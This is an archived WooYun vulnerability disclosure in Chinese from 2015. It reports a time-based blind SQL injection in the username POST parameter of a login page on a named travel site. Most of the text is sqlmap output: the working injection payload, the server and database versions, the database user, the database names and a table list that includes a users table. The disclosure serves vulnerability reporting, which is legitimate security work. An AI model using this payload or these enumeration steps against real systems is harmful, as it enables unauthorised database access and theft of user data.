乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-31: 细节已通知厂商并且等待厂商处理中 2015-09-05: 厂商已经主动忽略漏洞,细节向公众公开
花千骨看的纠结,能不能好好播出呢。
SQL注入,POST类型http://mt.mangocity.com/tcpb/index.php?c=login_controller&m=loginPOST参数:secret=1&username=*username参数存在注入
sqlmap identified the following injection points with a total of 1293 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: secret=1&username=tencent' AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))NcLg)-- ApJH21=6 AND '000eQNr'='000eQNr Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: PHP 5.3.28back-end DBMS: MySQL 5.0.12current user: '[email protected]/4.58'current database: 'vacation_tuanjian'current user is DBA: Falseavailable databases [3]:[*] `696E666F726D6174696F6E5F736368656`[*] test[*] vacation_tuanjiansqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: secret=1&username=tencent' AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))NcLg)-- ApJH21=6 AND '000eQNr'='000eQNr Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: PHP 5.3.28back-end DBMS: MySQL 5.0.12No tables foundsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: secret=1&username=tencent' AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))NcLg)-- ApJH21=6 AND '000eQNr'='000eQNr Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: PHP 5.3.28back-end DBMS: MySQL 5.0.12Database: vacation_tuanjian[9 tables]+--------------------+| ci_sessions || keyword || product || product_mask || setting || term_relationships || term_taxonomy || terms || users |+--------------------+
参数过滤
危害等级:无影响厂商忽略
忽略时间:2015-09-05 15:30
漏洞Rank:15 (WooYun评价)
暂无